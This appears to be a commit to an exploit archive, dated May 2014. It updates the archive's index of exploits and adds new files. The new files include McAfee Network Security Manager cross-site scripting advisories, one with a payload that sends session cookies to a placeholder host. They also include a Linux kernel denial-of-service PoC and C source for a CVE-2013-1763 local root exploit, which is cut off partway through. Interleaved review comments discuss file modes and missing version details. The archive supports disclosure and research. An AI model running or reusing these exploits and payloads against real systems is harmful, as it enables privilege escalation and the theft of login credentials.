Updated 05_15_2014

Offensive Security 2014-05-15 04:36:26 +00:00
parent 3a841992e3
commit 7371706026
23 changed files with 1422 additions and 631 deletions


@ -3605,7 +3605,7 @@ id,file,description,date,author,platform,type,port
3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control (lttmb14E.ocx) Remote BoF Exploit",2007-05-18,shinnai,windows,remote,0
3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL) BoF Exploit",2007-05-18,shinnai,windows,remote,0
3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities",2007-05-19,"Mehmet Ince",php,webapps,0
3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
3955,platforms/php/webapps/3955.py,"Zomplog <= 3.8 (mp3playlist.php speler) Remote SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0
3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
@ -4945,9 +4945,9 @@ id,file,description,date,author,platform,type,port
5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection Vulnerability",2008-03-25,girex,php,webapps,0
5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 (mod.php) Local File Inclusion Vulnerability",2008-03-25,girex,php,webapps,0
5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities",2008-03-26,meathive,hardware,remote,0
5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD Remote DoS Exploit",2008-03-26,muts,windows,dos,0
5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit",2008-03-26,muts,windows,dos,0
5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0
5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability",2008-03-28,parad0x,php,webapps,0
5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0
@ -5081,7 +5081,7 @@ id,file,description,date,author,platform,type,port
5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 poll Remote SQL Injection Vulnerability",2008-04-14,S@BUN,php,webapps,0
5449,platforms/php/webapps/5449.php,"KwsPHP (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0
5450,platforms/php/webapps/5450.txt,"Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability",2008-04-15,JosS,php,webapps,0
5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database <= 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
5453,platforms/windows/dos/5453.pl,"DivX Player <= 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0
5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability",2008-04-15,cO2,php,webapps,0
@ -9075,7 +9075,7 @@ id,file,description,date,author,platform,type,port
9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability",2009-09-09,DokFLeed,asp,webapps,0
9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0
9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BOF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BOF (SEH)",2009-09-09,hack4love,windows,local,0
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0
@ -9131,7 +9131,7 @@ id,file,description,date,author,platform,type,port
9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 (.XML File) Buffer Overflow PoC",2009-09-14,the_Edit0r,windows,dos,0
9671,platforms/windows/dos/9671.py,"Tuniac v.090517c (.PLS File) Local Crash PoC",2009-09-14,zAx,windows,dos,0
9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Auth Bypass) SQL Injection Vulnerability",2009-09-15,snakespc,php,webapps,0
9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln",2009-09-15,R3d-D3V!L,asp,webapps,0
9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 /Scripts Access Restriction Bypass Vulnerability",2009-09-15,"Usman Saeed",windows,remote,0
@ -9146,12 +9146,12 @@ id,file,description,date,author,platform,type,port
9687,platforms/windows/local/9687.py,"SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)",2009-09-15,mr_me,windows,local,0
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 (ping option) Command Injection Vulnerability (auth)",2009-09-15,r00t,hardware,local,0
9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 (m3u File) Local Crash PoC",2009-09-15,zAx,windows,dos,0
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 (.PLS file) Local Crash Exploit",2009-09-15,prodigy,windows,dos,0
9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability",2009-09-15,InjEctOr5,php,webapps,0
9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0
9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability",2009-09-16,Dr_IDE,windows,remote,0
9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability",2009-09-16,snakespc,php,webapps,0
9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection Vulnerability",2009-09-16,"Chip d3 bi0s",php,webapps,0
9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip d3 bi0s",php,webapps,0
@ -9189,7 +9189,7 @@ id,file,description,date,author,platform,type,port
9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0
9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80
9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0
9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler exploit",2009-09-29,bruiser,windows,remote,0
@ -9973,7 +9973,7 @@ id,file,description,date,author,platform,type,port
10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0
10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0
10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
@ -10111,7 +10111,7 @@ id,file,description,date,author,platform,type,port
10968,platforms/php/webapps/10968.txt,"portal modulnet <= 1.0 - (id) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,php,webapps,0
10971,platforms/php/webapps/10971.txt,"Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability",2010-01-03,R3d-D3V!L,php,webapps,0
10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit 2",2010-01-03,DouBle_Zer0,windows,remote,0
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)",2010-01-03,DouBle_Zer0,windows,remote,0
10974,platforms/php/webapps/10974.txt,"Simple Portal <= 2.0 - Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0
10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop (productdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
10977,platforms/php/webapps/10977.txt,"Smart Vsion Script News (newsdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
@ -10846,7 +10846,7 @@ id,file,description,date,author,platform,type,port
11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0
11876,platforms/php/webapps/11876.txt,"justVisual 2.0 (index.php) <= LFI Vulnerability",2010-03-25,eidelweiss,php,webapps,0
11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF",2010-03-25,sud0,windows,remote,21
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 DoS",2010-03-25,_SuBz3r0_,windows,dos,69
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69
11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0
11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0
11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit",2010-03-25,Sc0rpi0n,php,webapps,0
@ -14130,7 +14130,7 @@ id,file,description,date,author,platform,type,port
16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0
16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21- Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0
16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,metasploit,windows,remote,0
16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
@ -14206,7 +14206,7 @@ id,file,description,date,author,platform,type,port
16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 Buffer Overflow",2010-11-30,metasploit,windows,remote,0
16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,metasploit,windows,remote,0
16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16427,platforms/windows/remote/16427.rb,"Windows RSH daemon Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,metasploit,windows,remote,0
@ -19700,7 +19700,7 @@ id,file,description,date,author,platform,type,port
22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting",2012-11-04,D4NB4R,php,webapps,0
22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 Stack Overflow Crash PoC",2012-11-04,coolkaveh,windows,dos,0
22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 Local Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
22467,platforms/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos,0
22468,platforms/unix/remote/22468.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1)",2003-04-11,Xpl017Elz,unix,remote,0
22469,platforms/unix/remote/22469.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2)",2003-04-07,c0wboy,unix,remote,0
@ -21680,8 +21680,8 @@ id,file,description,date,author,platform,type,port
24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability",2013-02-19,LiquidWorm,php,webapps,0
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
24526,platforms/windows/remote/24526.py,"MS Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2 SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
24529,platforms/php/remote/24529.rb,"OpenEMR PHP File Upload Vulnerability",2013-02-20,metasploit,php,remote,0
24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
@ -21887,7 +21887,7 @@ id,file,description,date,author,platform,type,port
24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow Vulnerability",2013-03-13,coolkaveh,windows,dos,0
24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 - 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0
24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,metasploit,windows,remote,0
24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers - Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
24748,platforms/php/webapps/24748.txt,"event calendar Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0
24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
@ -30035,6 +30035,7 @@ id,file,description,date,author,platform,type,port
33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 CVE-2009-3382 Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection",2014-05-12,"Chris Hebert",php,webapps,443
33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 'printf(1)' Format String Parsing Denial of Service Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0
@ -30049,3 +30050,18 @@ id,file,description,date,author,platform,type,port
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0
33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 search.php from_date_day Parameter Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0
33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 search.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 index.php New User Creation CSRF",2009-11-10,"Andrew Horton",php,webapps,0
33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0
33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 Multiple Cross Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0
33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure Vulnerability",2009-11-06,"Daniel King",jsp,webapps,0
33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0
33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0
33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 '/dhost/modules?I:' Buffer Overflow Vulnerability",2009-11-12,HACKATTACK,novell,remote,0


12
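--- a/platforms/jsp/webapps/33346.txt
+++ b/platforms/jsp/webapps/33346.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37003/info
+McAfee Network Security Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+These issues affect McAfee Network Security Manager 5.1.7.7; other versions may also be affected.
+https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
+https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57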
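Review bot: Every added file whose header is visible on this page is recorded as `Executable file` (this one, plus 33347.txt, 33338.c, 33336.txt, 33337.c and 33317.txt further down), although they are advisories and proof-of-concept sources that nothing should run straight from a checkout. I would commit them as mode 100644, so that a stray `./file` or a tool that honours the execute bit cannot launch archive content. Separately, the last URL in this file contains `â??XSSâ??`, which looks like typographic quotes damaged by a wrong character encoding; the file should be stored as UTF-8 so the archived text matches the original advisory.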

11
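--- a/platforms/jsp/webapps/33347.txt
+++ b/platforms/jsp/webapps/33347.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37004/info
+McAfee Network Security Manager is prone to an information-disclosure vulnerability because it fails to properly protect sensitive cookie data with the 'HTTPOnly' protection mechanism.
+A successful exploit may allow attackers to steal cookie-based authentication credentials; information harvested may aid in further attacks.
+This issue affects McAfee Network Security Manager 5.1.7.7; other versions may also be affected.
+https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
+4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57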

13
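--- a/platforms/linux/dos/33338.c
+++ b/platforms/linux/dos/33338.c
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/36953/info
+The Linux kernel is prone to a local denial-of-service vulnerability that stems from a NULL-pointer dereference.
+Attackers can exploit this issue to crash the affected computer, denying service to legitimate users.
+int main()
+{
+static long long a[1024 * 1024 * 20] = { 0 };
+return a;
+}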
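Review bot: The advisory text above `int main()` gives no affected kernel versions and no fixing release, so nobody can decide from this file whether a host is exposed; the `files.csv` row only says `2.6.x`. I would add both under the `source:` line, for example `fixed in: <FIXED_KERNEL_VERSION>` with the value taken from the referenced BID entry. platforms/osx/dos/33337.c has the same gap: its comment lists the tested releases 10.5.6 and 10.5.7 but no fixed release.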

164
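--- a/platforms/linux/local/33336.txt
+++ b/platforms/linux/local/33336.txt
@@ -0,0 +1,164 @@
+/*
+* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
+* bug found by Spender
+* poc by SynQ
+*
+* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
+* using nl_table->hash.rehash_time, index 81
+*
+* Fedora 18 support added
+*
+* 2/2013
+*/
+#include <unistd.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <netinet/tcp.h>
+#include <errno.h>
+#include <linux/if.h>
+#include <linux/filter.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <linux/sock_diag.h>
+#include <linux/inet_diag.h>
+#include <linux/unix_diag.h>
+#include <sys/mman.h>
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+unsigned long sock_diag_handlers, nl_table;
+int __attribute__((regparm(3)))
+kernel_code()
+{
+commit_creds(prepare_kernel_cred(0));
+return -1;
+}
+int jump_payload_not_used(void *skb, void *nlh)
+{
+asm volatile (
+"mov $kernel_code, %eax\n"
+"call *%eax\n"
+);
+}
+unsigned long
+get_symbol(char *name)
+{
+FILE *f;
+unsigned long addr;
+char dummy, sym[512];
+int ret = 0;
+f = fopen("/proc/kallsyms", "r");
+if (!f) {
+return 0;
+}
+while (ret != EOF) {
+ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
+if (ret == 0) {
+fscanf(f, "%s\n", sym);
+continue;
+}
+if (!strcmp(name, sym)) {
+printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
+fclose(f);
+return addr;
+}
+}
+fclose(f);
+return 0;
+}
+int main(int argc, char*argv[])
+{
+int fd;
+unsigned family;
+struct {
+struct nlmsghdr nlh;
+struct unix_diag_req r;
+} req;
+char buf[8192];
+if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
+printf("Can't create sock diag socket\n");
+return -1;
+}
+memset(&req, 0, sizeof(req));
+req.nlh.nlmsg_len = sizeof(req);
+req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
+req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
+req.nlh.nlmsg_seq = 123456;
+//req.r.sdiag_family = 89;
+req.r.udiag_states = -1;
+req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
+if(argc==1){
+printf("Run: %s Fedora|Ubuntu\n",argv[0]);
+return 0;
+}
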